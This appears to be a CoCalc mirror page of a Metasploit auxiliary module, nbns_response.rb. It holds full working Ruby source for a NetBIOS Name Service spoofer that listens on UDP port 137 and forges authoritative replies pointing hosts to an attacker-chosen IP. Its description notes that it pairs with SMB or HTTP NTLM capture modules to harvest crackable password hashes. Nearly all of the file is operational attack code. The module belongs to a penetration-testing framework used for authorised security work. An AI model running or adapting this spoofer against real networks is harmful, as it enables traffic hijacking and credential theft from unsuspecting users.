CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/spoof/nbns/nbns_response.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Capture78attr_accessor :sock, :thread91011def initialize12super(13'Name' => 'NetBIOS Name Service Spoofer',14'Description' => %q{15This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests16sent to the local subnet's broadcast address and spoof a response, redirecting the querying17machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or18auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on19common networks.2021This module must be run as root and will bind to udp/137 on all interfaces.22},23'Author' => [ 'Tim Medin <tim[at]securitywhole.com>' ],24'License' => MSF_LICENSE,25'References' =>26[27[ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ]28],29'Actions' =>30[31[ 'Service', 'Description' => 'Run NBNS spoofing service' ]32],33'PassiveActions' =>34[35'Service'36],37'DefaultAction' => 'Service'38)3940register_options([41OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", "127.0.0.1"]),42OptRegexp.new('REGEX', [ true, "Regex applied to the NB Name to determine if spoofed reply is sent", '.*']),43])4445deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')46self.thread = nil47self.sock = nil48end4950def dispatch_request(packet, rhost, src_port)51rhost = ::IPAddr.new(rhost)52# `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped53# addr like "::ffff:192.168.0.1" when the interface we're listening54# on has an IPv6 address. Convert it to just the v4 addr55if rhost.ipv4_mapped?56rhost = rhost.native57end5859# Convert to string60rhost = rhost.to_s6162spoof = ::IPAddr.new(datastore['SPOOFIP'])6364return if packet.length == 06566nbnsq_transid = packet[0..1]67nbnsq_flags = packet[2..3]68nbnsq_questions = packet[4..5]69nbnsq_answerrr = packet[6..7]70nbnsq_authorityrr = packet[8..9]71nbnsq_additionalrr = packet[10..11]72nbnsq_name = packet[12..45]73decoded = ""74nbnsq_name.slice(1..-2).each_byte do |c|75decoded << "#{(c - 65).to_s(16)}"76end77nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()78nbnsq_type = packet[46..47]79nbnsq_class = packet[48..49]8081return unless nbnsq_decodedname =~ /#{datastore['REGEX'].source}/i8283print_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{spoof}")8485vprint_status("transid: #{nbnsq_transid.unpack('H4')}")86vprint_status("tlags: #{nbnsq_flags.unpack('B16')}")87vprint_status("questions: #{nbnsq_questions.unpack('n')}")88vprint_status("answerrr: #{nbnsq_answerrr.unpack('n')}")89vprint_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")90vprint_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")91vprint_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")92vprint_status("full name: #{nbnsq_name.slice(1..-2)}")93vprint_status("decoded: #{decoded}")94vprint_status("decoded name: #{nbnsq_decodedname}")95vprint_status("type: #{nbnsq_type.unpack('n')}")96vprint_status("class: #{nbnsq_class.unpack('n')}")9798# time to build a response packet - Oh YEAH!99response = nbnsq_transid +100"\x85\x00" + # Flags = response + authoritative + recursion desired +101"\x00\x00" + # Questions = 0102"\x00\x01" + # Answer RRs = 1103"\x00\x00" + # Authority RRs = 0104"\x00\x00" + # Additional RRs = 0105nbnsq_name + # original query name106nbnsq_type + # Type = NB ...whatever that means107nbnsq_class+ # Class = IN108"\x00\x04\x93\xe0" + # TTL = a long ass time109"\x00\x06" + # Datalength = 6110"\x00\x00" + # Flags B-node, unique = whatever that means111spoof.hton112113pkt = PacketFu::UDPPacket.new114pkt.ip_saddr = Rex::Socket.source_address(rhost)115pkt.ip_daddr = rhost116pkt.ip_ttl = 255117pkt.udp_sport = 137118pkt.udp_dport = src_port119pkt.payload = response120pkt.recalc121122capture_sendto(pkt, rhost)123end124125def monitor_socket126while true127rds = [self.sock]128wds = []129eds = [self.sock]130131r,_,_ = ::IO.select(rds,wds,eds,0.25)132if (r != nil and r[0] == self.sock)133packet, host, port = self.sock.recvfrom(65535)134dispatch_request(packet, host, port)135end136end137end138139def run140check_pcaprub_loaded()141::Socket.do_not_reverse_lookup = true # Mac OS X workaround142143# Avoid receiving extraneous traffic on our send socket144open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})145146self.sock = Rex::Socket.create_udp(147'LocalHost' => "0.0.0.0",148'LocalPort' => 137,149'Context' => { 'Msf' => framework, 'MsfExploit' => self }150)151add_socket(self.sock)152self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)153154self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {155begin156monitor_socket157rescue ::Interrupt158raise $!159rescue ::Exception160print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")161end162}163164print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX'].source}\" ...")165166self.thread.join167print_status("NBNS Monitor thread exited...")168end169170def cleanup171if self.thread and self.thread.alive?172self.thread.kill173self.thread = nil174end175self.sock.close176close_pcap177end178end179180181